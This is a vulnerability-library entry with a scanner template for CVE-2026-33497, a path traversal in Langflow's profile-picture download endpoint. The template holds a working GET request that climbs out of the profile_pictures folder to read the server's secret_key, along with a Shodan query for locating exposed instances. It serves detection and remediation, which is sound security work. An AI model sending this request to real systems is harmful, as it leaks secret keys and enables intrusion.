/Vulnerability Library

Langflow < 1.7.0 - Path Traversal

CVE-2026-33497
Verified

Description

Langflow < 1.7.1 contains a path traversal caused by insufficient filtering of folder_name and file_name parameters in download_profile_picture endpoint, letting attackers read secret_key across directories, exploit requires crafted request.

Severity

High

CVSS Score

7.5

Exploit Probability

20%

Published Date

July 13, 2026

Template Author

xtr0nix

CVE-2026-33497.yaml
id: CVE-2026-33497

info:
  name: Langflow < 1.7.0 - Path Traversal
  author: xtr0nix
  severity: high
  description: |
    Langflow < 1.7.1 contains a path traversal caused by insufficient filtering of folder_name and file_name parameters in download_profile_picture endpoint, letting attackers read secret_key across directories, exploit requires crafted request.
  impact: |
    Attackers can read sensitive secret_key files across directories, potentially compromising system security.
  remediation: |
    Update to version 1.7.1 or later.
  reference:
    - https://github.com/langflow-ai/langflow/security/advisories/GHSA-ph9w-r52h-28p7
    - https://nvd.nist.gov/vuln/detail/CVE-2026-33497
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-33497
    epss-score: 0.19584
    epss-percentile: 0.97173
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Langflow"
  tags: cve,cve2026,langflow,traversal,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/files/profile_pictures/../secret_key"

    matchers:
      - type: dsl
        dsl:
          - len(body) == 43
          - status_code == 200
          - contains(content_type, 'application/octet-stream')
        condition: and
# digest: 4a0a00473045022100d451a1835110b1e8ee53e7f8b4d1ca84896aebea4e8c59821fe052cb02b0e7aa022068cfbf9f9db0bf5ccaea2c9176a1a837576c8aca419097ef544859cc24445e50:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-33497
CWE ID:
cwe-22

References

https://github.com/langflow-ai/langflow/security/advisories/GHSA-ph9w-r52h-28p7https://nvd.nist.gov/vuln/detail/CVE-2026-33497

Remediation Steps

Update to version 1.7.1 or later.